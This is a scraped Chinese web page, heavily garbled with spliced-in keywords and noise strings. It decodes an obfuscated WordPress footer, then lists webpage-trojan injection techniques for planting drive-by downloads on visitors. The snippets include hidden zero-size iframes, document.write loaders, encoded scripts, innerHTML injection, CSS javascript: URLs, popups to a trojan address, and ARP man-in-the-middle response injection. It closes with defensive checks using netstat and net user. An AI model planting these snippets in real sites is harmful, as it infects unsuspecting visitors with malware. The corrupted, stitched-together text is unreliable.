皮皮网

皮皮网

【b2b加工平台源码】【源码投票程序】【dtu web源码】nwjs源码加密

时间:2024-11-30 03:46:16 分类:知识

1.base64_decode(" 解密
2.在网页是源码让访问网页的人自动下载并且自动安装的代码

nwjs源码加密

base64_decode(" 解密

       æ— èŠå‘€ï¼Œè€æ˜¯çœ‹è§æœ‰æ— èŠçš„人用PHP来加密。

       å…¶å®žPHP是无法加密的,只要把eval替换为exit,运行一次就能看见源代码,不过现在无聊的人都很变态,比如这个代码就被反复“加密”了次~

       â€œè§£å¯†â€åŽçš„代码如下:

       <?php

       /* please do not edit anything here */

       include("footer_content.php");

       echo '<div id="footcopy" style="background-image:url('.get_bloginfo('template_directory').'/images/footer_copy.gif);height:px;display:block;color:#;text-align:center;padding-top:px;">

       <div class="onethousand_wrap">

       <a href="">Zionn</a> designed by <a title="ZENVERSE Premium Themes" href="">ZENVERSE</a>  |  In conjunction with <a href="">Reseller Hosting</a> from the #1 <a href="">Web Hosting Provider</a> - HostNexus.

       </div>

       </div>';

       $zenverse_global_google_analytics = get_option('zenverse_global_google_analytics');

       if ($zenverse_global_google_analytics != '')

       wp_footer();

       echo '</body></html>';

>

在网页是让访问网页的人自动下载并且自动安装的代码

       一:框架挂马浪漫之家社区门户.}8d{ ocb

       ;Z}x?\` sT-e0 <iframe src=地址 width=0 height=0></iframe>浪漫之家社区门户*f2iNFvtV$V

       ]-iXpQG+v$\0二:js文件挂马浪漫之家社区门户2D(D_3QU1a YS

       T,UEsy(~ Q!i"K0 首先将以下代码浪漫之家社区门户XvK&DSs_ n

        document.write("<iframe width='0' height='0' src='地址'></iframe>");浪漫之家社区门户7v1rWpv4E`

        保存为xxx.js,

       0];Q.E?加密N A0 则JS挂马代码为

       xt].y4QfX0 <script language=javascript src=xxx.js></script>

       (~+}Cy:R9ss0浪漫之家社区门户(rJ(E^5Z b|+p

       三:js变形加密浪漫之家社区门户w4{ 7v~ Cj

        浪漫之家社区门户gAub7\5Us

        <SCRIPT language="JScript.Encode" src=/muma.txt></script>浪漫之家社区门户'IQWSv

        muma.txt可改成任意后缀浪漫之家社区门户 aJ5~7sX]

       四:body挂马浪漫之家社区门户LV3X"HVc?#[

       7y0k9P;Z&hn0 <body ></body>

       0u yo.{ \Za0浪漫之家社区门户;M2cA Xo,[\,m

       五:隐蔽挂马

       P2@vj2\m}.LBf0浪漫之家社区门户bF9^c A;i[6\;l k`

        top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="/"></iframe>';浪漫之家社区门户o1}"uC)u

       浪漫之家社区门户'_g+N#` x'@$x

       六:css中挂马浪漫之家社区门户^1c9|5T+E3A l `0R

       .P:ZGz3qy`0 body { 浪漫之家社区门户*]&N5b+S2d!k v!p%o

        background-image: url('javascript:document.write("<script src=(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的源码内容 </a>

       _`!xA,B3e zt6T;C0<SCRIPT Language="JavaScript">浪漫之家社区门户L%w~StQ-@5]S

       function www__com ()浪漫之家社区门户O U7\%d Z7x

       { 浪漫之家社区门户%l4y"C)R&j-Re1g

       var url="网马地址";

       [};t0A&G0open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=,height=,left=,top=");浪漫之家社区门户 Wh!j+Hm;`c

       }浪漫之家社区门户)r5g#Sj7SB4^_

       </SCRIPT>

       :y&N~-a!^$?dd6E0浪漫之家社区门户u~E6KQD

       十一: 超级网马—通过arp欺骗来直接挂马

       :mhZ2F3r3r-z$s2O0

       "YO8C^i$rl/].o0原理:arp中间人攻击,实际上相当于做了一次代理。加密浪漫之家社区门户]%DpqmFV?源码C8E7_F

       浪漫之家社区门户:|3_j$@&aw.]?t

       正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机

       7LI KTs0arp中间人攻击时候: A---->C---->B

       gh|$[b N0B---->C---->A

       iIqcO8v0实际上,C在这里做了一次代理的作用浪漫之家社区门户9lxbjEE9_3Xr r L

       浪漫之家社区门户R.{ *kT9Ui

       那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

       8cd1bA j+v}0

       p6j4xgv0如何处理网页木马:

       .r:ej y}izC#i、加密b2b加工平台源码找到嵌入的源码网页木马文件。以下,加密拿自己的源码经历说事。找到的加密文件是wm.htm

       #c [:[}.caA ?4s)ax0浪漫之家社区门户C%qQ7Xd M-i8T,\ q

       2、在注册表中查找wm.htm。源码很幸运,加密找到了。源码开始顺藤摸瓜...浪漫之家社区门户)qJXkHY)I

       浪漫之家社区门户*@ L uIi

       3、加密修改键值wm.htm为wm_nnd.htm。源码

       /bX0e5I-`0浪漫之家社区门户R+jyC)wk8Kl,y

       4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,源码投票程序有意外发现。浪漫之家社区门户bQ[7~,\2P

        cain.exe,据说是密码嗅探器。浪漫之家社区门户gG.px xa_C

       8m9e"z5^!q)[8By8iY;BA、修改键值cain.exe为cain_nnd.exe。

       `m+b3@ @-H0浪漫之家社区门户ax;U+p1n(J

       6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。dtu web源码

       M*UQ:\7Rc`B0浪漫之家社区门户U(F0Nu9W

       7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。浪漫之家社区门户}zj4x V2G

       浪漫之家社区门户V;q0l:@Sri

       8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

       vI4f J)L o)D0

       'i G*E W*^a、发现temp*.exe(全名记不清了),立马net stop server 。有车以后源码浪漫之家社区门户;F{ %\B7r a9eY

       'W2IH9bP2MI:Oxkk、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

       0jW r7O C0

       (j}y,w6G+Z、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

       Q(|%h,}t0

       5VO\mW@;y.N;n、观察了几天,没再发生挂马的爱看阅读源码现象。 另外,通过检测网络连接查看服务器是否中了木马或病毒浪漫之家社区门户3\O] @n{ r

       浪漫之家社区门户I$@K9QN&S${ /U

       1、使用netstat -an 查看所有和本地计算机建立连接的IP。

       .gB1n dL(|H}0

       (B.Qv1v%?2k+G X、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。

       7J;rK5WE0浪漫之家社区门户"i \$J\ KI

       3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下

       1BKY-~#Bx8u@J#G0浪漫之家社区门户2@wQY5M

       REM 注释:监控的时间

       ;|)RUz!A;X@0time /t>>Netstat.log浪漫之家社区门户L:vR9ZSum

       REM 每隔秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件浪漫之家社区门户8| F { .f,p*H5f a]

       Netstat -n -p tcp >>Netstat.log浪漫之家社区门户9LUgLM(X[%v

       dA_"C_`!J+{ 0注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。浪漫之家社区门户y Bs}mZ\

       浪漫之家社区门户e&f$J!@#k

       仅仅这些还不够,说说更严重的:浪漫之家社区门户 nw!C~/@.k { bc_

       6UM T%`3HQs8`m r、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。浪漫之家社区门户i{ ${ 1}v1hd+r$E"ix

        浪漫之家社区门户 j8o0~|`:~^"B&G

       2、赶快检测系统帐户:

       X!u'w Q7^*cJ(o&OH0a、在命令行下输入net user,查看计算机上有些什么用户。浪漫之家社区门户] t G.^ @T

       b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。

       9b)~~&x0?"l,Gru0c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,

       E T/u/d%i#B1{ u0 那么别人在你的计算机上克隆账户的概率为%。浪漫之家社区门户*w}+g9B0\

       d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。